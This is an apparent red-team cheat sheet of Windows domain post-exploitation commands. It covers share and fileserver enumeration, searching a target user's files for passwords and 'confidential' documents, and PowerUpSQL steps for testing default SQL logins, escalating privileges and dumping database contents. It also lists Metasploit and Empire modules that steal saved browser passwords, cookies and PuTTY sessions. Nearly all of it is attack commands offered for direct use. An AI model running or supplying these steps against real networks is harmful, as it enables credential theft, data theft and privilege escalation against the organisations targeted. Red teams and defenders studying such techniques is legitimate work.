Network Shares and Fileservers Enumeration
# List shares on the local host
net share
# List network computers
net view
# List shares on a remote PC
net view COMPUTER_NAME /all
#What if net commands are blocked on the network?
# List shares on the local host
wmic share get /format:list
# List shares on a remote PC
wmic /node: COMPUTER_NAME share get
Computers / Servers Enumeration
# List all domain computers and filter all computers with “FILE” in their name
net group "Domain Computers" /domain | findstr "FILE"
# Find network shares and fileservers using Powerview
Find-DomainShare
Get-DomainFileServer
# Powerview modules in Empire:
situational_awareness/network/powerview/share_finder
situational_awareness/network/powerview/get_fileserver
Admin Workstation Compromise Post Exploitation
# Metasploit modules
post/windows/gather/enum_putty_saved_sessions
# Empire modules
collection/netripper
credentials/sessiongopher
Local file Searching
# List a target user’s recently accessed files
dir C:\Users\TARGET\AppData\Roaming\Microsoft\Windows\Recent
# Search for files with specific extensions
dir *.docx *.xlsx *.pdf /s
# Search all .txt and .csv files for occurrences of “root”, “username”, “password” and “pass”
findstr /S/I "root username password pass" *.txt *.csv
#Powerview
# Find all files accessed within the last week
Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)
# Find all documents containing the words “private” and “confidential”
Find-InterestingFile -Include private,confidential
# Find all MS Office documents on a remote share
Find-InterestingFile -Path \\SERVER\Share -OfficeDocs
Tool - PowerUpSQL - https://github.com/NetSPI/PowerUpSQL
# Find all local SQL instances:
Get-SQLInstanceLocal -Verbose
# Find all SQL instances across a domain/network:
Get-SQLInstanceDomain -Verbose
Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDP -Verbose
# Enumerate basic information about local SQL instances
Get-SQLInstanceLocal | Get-SQLServerInfo
# Enumerate basic information about a remote SQL instance
Get-SQLServerInfo -Instance "COMPUTER_NAME"
# List SQL instances that can be logged into as the current domain user
Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10
# Attempt to gain admin rights on an SQL instance (unnecessary if you’re already admin)
Invoke-SQLEscalatePriv -Verbose -Instance "COMPUTER_NAME"
# List SQL instances across the domain using default passwords
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
# Dump SQL Server and database information to csv or xml files.
Invoke-SQLDumpInfo -Verbose -Instance "COMPUTER_NAME"
# Run numerous audit functions against an SQL server
Invoke-SQLAudit -Verbose -Instance "COMPUTER_NAME"
Port Database
1433 Microsoft SQL
3306 MySQL
5432 PostgreSQL
27017 MongoDB
# Metasploit modules
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
# Empire modules
collection/ChromeDump
collection/FoxDump
# Firefox profile location
C:\Users\TARGET\AppData\Roaming\Mozilla\Firefox\Profiles
# Google Chrome profile location
C:\Users\TARGET\AppData\Local\Google\Chrome\User Data\Default